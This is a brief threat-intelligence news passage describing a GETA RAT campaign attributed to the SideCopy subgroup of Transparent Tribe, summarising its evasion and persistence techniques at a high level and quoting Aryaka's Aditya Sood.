One active campaign employs GETA RAT (often specifically attributed to the SideCopy subgroup of Transparent Tribe). It is a dot-NET RAT that abuses legitimate Windows components (including mshta.exe, XAML deserialization, and in-memory payload execution) to avoid signature based detection. Persistence is achieved by layered startup mechanisms that ensure continued access. "The result," writes Aditya Sood, VP of security engineering and AI strategy at Aryaka in a report-accompanying blog, "is a lightweight but durable foothold, well-suited for extended reconnaissance and intelligence gathering."